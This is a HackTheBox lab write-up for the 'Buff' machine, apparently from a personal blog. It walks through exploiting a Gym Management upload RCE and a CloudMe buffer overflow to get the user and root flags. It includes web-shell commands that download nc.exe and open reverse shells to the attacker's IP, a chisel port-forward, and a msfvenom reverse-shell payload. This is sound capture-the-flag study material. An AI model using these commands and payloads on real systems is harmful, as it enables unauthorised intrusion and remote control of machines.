Buff — HackTheBox (User and Root Flag ) Write-Up
I experienced some problems while hacking this machine (Buff) on HackTheBox. Took me 2 days to get the root flag, Not really needed the problem is mine. So I thought of writing the step by step procedure to find the flags easily. Let’s learn together. So let’s get straight into the process.
If you are new to HackTheBox go to Access and download your connection pack and run
sudo openvpn <user-name.ovpn>
when we go to the machine tab you can see the Buff there and will get the IP as 10.10.10.198
As a start run basic scan with nmap : sudo nmap -sV -sC -sT -O 10.10.10.198 We can’t find anything interesting only port 8080 is open so let’s try on the WebApp. In real world while we are testing on WebApps, first we will visit all pages. Same here when we visit the URI /contact.php
That’s a nice Hint to the next level. As usuall when we get a hint such as this we need to google if there are any known vulnerabilities available to exploit. We can see there is a Remote Code Execution bug is there
So let’s find the User flag first
So we got the exploit. Download the exploit. There when we read the exploit we can see that the bug is in the upload.php URI and Let’s exploit and find something run the following command to run the exploit.
python 48506.py http://10.10.10.198:8080/
wow!! so let’s try something cool, as said in the exploit the the bug is in upload.php and the files are uploaded to http://10.10.10.198:8080/upload/kamehameha.php?telepathy=<command-here> .Here kamehameha.php is the exploit file that’s uploaded and telepathy parameter is the parameter through which we are gonna run the commands. Next we need some files in order to proceed. Most of the files are there in our kali machine or else just google it and download ( simple search and download )
copy the file into a directory and on the same directory run:
sudo python3 -m http.server 80 — This will open a server on the directory and find your ip using ifconfig
If you dont have python3 installed : sudo apt install python3
Now we need to transfer the nc.exe to windows machine by our browser (there are many ways I prefered this one)
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/nc.exe
This will download nc.exe on the windows machine to confirm
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=dir
it will list the files in the directory and you can see kamehameha.php and nc.exe there. So lets make a reverse shell to our linux machine. For that we need to listen to a netcat server
To connect back to this run the following on the browser
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.14.25 1337
The user flag is on the Desktop actually so in order to get that just
Hooray we got the user flag so submit it on HackTheBox and we need to find one more. In order to find root flag we need Admin privilages so we can’t access directly on /users/Administrator/Desktop/root.txt.
Let’s find the Root Flag
This one took my 70 % time to get, due to some problem with my ssh. Actually it’s simple. So lets dig more on the windows machine, as we are digging we can see there is a file in the Downloads folder
in order to confirm for any usage of this file let’s go back one more time to the previous upload directory and
Download winPEAS.exe
If you can’t find the file; run the following commands on the directory where we put the nc.exe and files
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/
cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./
This will copy the file to to the directory
Download chisel.exe and chisel on linux — I preffered this because I already said that I have some problem with connecting to ssh, so for ssh purpose I use chisel. To download and install chisel:
https://github.com/jpillora/chisel/releases/download/v1.7.2/chisel_1.7.2_windows_amd64.gz → chisel for windows, download the file and extract the chisel.exe to our directory
sudo apt install golang-go → if go is not installed
go get github.com/jpillora/chisel → install chisel on the linux
cp ~/go/bin/chisel /bin/ → will help to run chisel on terminal
chisel -h → to check if it’s installed properly
Now we need to transfer those files on to our windows machine. If you closed the python http.server we opened previously, once more run sudo python3 -m http.server 80. Then in order to transfer the files from the directory (make sure we opened http.server on the directory that have chisel.exe winPEAS.exe).
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/chisel.exe
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/winPEAS.exe
make sure your windows server is still connected and running just by ping 10.10.10.198 else connect once more and proceed.
After these all run dir on the windows server to list the transferred files. If they all right
Now run winPEAS.exe it will show us the problems within that privilages running process and things like that, when we are looking carefully we can see that a port 8888 is used by something
So we can confirm the cloudme is running (it’s on 8888) and now try to find any exploits. you will get one here : https://www.exploit-db.com/exploits/48389 Download it
Now we need to change payload on the exploit for that run
msfvenom -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.25 7777' -b ‘\x00\x0A\x0D’ -f python -v payload
Copy the selected part and change it on the 48389.py
Now we can forward the 8888 port from windows to our linux machine in order to proceed the overflow vulnerability.
chisel server -p 8080 -reverse — on linux
chisel.exe client 10.10.14.25:8080 R:8888:127.0.0.1:8888→ on windows server
There we can see a connection goes on.
let’s listen to the port which we used in order to create the payload i.e 7777 and run the exploit on another terminal to get the admin shell
nc -lvnp 7777
python2.7 48389.py
We can see the admin shell on nc. If nothing happened run python2.7 exploit.py 2–3 times, till not working I don’t really know.
After getting into the admin shell :
cd /users/Administrator/Desktop/
test root.txt → this is the 2nd flag
ENJOY ENJOY ENJOY
!! I accidentally quit a terminal which is running shells and that’s why you miss screenshots. I don’t have time to do that again, so apologies. !!
You may seen people using ssh or plink.exe in order to find the root flag. For me when I run the plink.exe command on windows it always shows connection timed out so that I decided to try with chisel
Find me on twitter : iam_j0ker